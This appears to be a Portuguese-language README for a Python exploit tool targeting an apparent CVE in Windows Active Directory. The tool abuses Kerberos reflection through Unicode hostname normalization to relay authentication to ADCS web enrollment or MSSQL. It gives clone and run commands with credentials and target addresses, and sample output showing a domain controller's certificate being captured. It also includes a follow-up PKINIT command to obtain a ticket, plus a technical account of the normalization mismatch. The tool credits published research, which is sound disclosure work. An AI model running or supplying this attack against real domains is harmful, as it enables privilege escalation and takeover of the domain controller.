
Explora a reflexão Kerberos via normalização Unicode no Windows Active Directory para retransmitir autenticação para ADCS e MSSQL, permitindo escalonamento de privilégios baseado em certificados.

Ferramenta em Python para explorar reflexão Kerberos via normalização Unicode no Windows Active Directory. Baseado na pesquisa de Guillaume André / Synacktiv.
Estas ferramentas são compatíveis apenas com Python 3.8+. Clone o repositório do GitHub, instale as dependências e está pronto para usar:
git clone https://github.com/jarnovandenbrink/CVE-2026-26128.git
cd CVE-2026-26128
pip install -r requirements.txt
python3 CVE-2026-26128.py contoso.com/john:password -t http://contoso-dc.contoso.com/certsrv/certfnsh.asp -l 192.168.1.80 -dc-ip 192.168.1.10
[*] Connecting to LDAP on 192.168.1.10
[*] LDAP connection established
[*] Adding DNS record: cⓞntoso-dc.contoso.com
[*] Waiting for DNS propagation... 180s
[*] DNS propagation complete
[*] Setting up SMB Server
[*] SMBD: Received connection from 192.168.1.10
[*] HTTP server returned status code 200, treating as a successful login
[*] [+] Attack worked!
[*] Certificate will be written to: /path/to/CONTOSO-DC.pfx
[*] To request a TGT using PKINIT run:
python3 gettgtpkinit.py contoso.com/CONTOSO-DC$ -cert-pfx /path/to/CONTOSO-DC.pfx -dc-ip 192.168.1.10 out.ccache
[*] GOT CERTIFICATE! ID 16
[*] Writing PKCS#12 certificate to ./CONTOSO-DC.pfx
[*] Certificate successfully written to file
Alternativamente, este ataque pode ser realizado contra o registro web do ADCS e o MSSQL. Observe que, para o relaying Kerberos para o MSSQL, o SQL Server deve estar em execução como a conta da máquina. Caso contrário, o AP-REQ não será descriptografado com a chave correta.
Esta ferramenta explora a forma como o Windows normaliza caracteres Unicode ao resolver SPNs. O serviço DnsCache usa CompareStringW com NORM_IGNORECASE, que trata ⓢⓡⓥ1․ⓐⓓ․ⓛⓞⓒⓐⓛ de forma diferente de srv1.ad.local, fazendo com que ele emita uma solicitação DNS. O Domain Controller, por outro lado, usa LCMapStringEx com os flags de normalização 0x31403. Ao registrar um registro DNS para o hostname Unicode e apontá-lo para a máquina do atacante, o AP-REQ pode ser retransmitido para qualquer serviço que não aplique channel binding ou integridade de comunicações.
Os alvos de relay suportados são o registro web do ADCS e o MSSQL. O suporte ao SCCM AdminService está planejado. Observe que o relay SMB não é mais possível em sistemas corrigidos com a atualização de Patch Tuesday de março de 2026.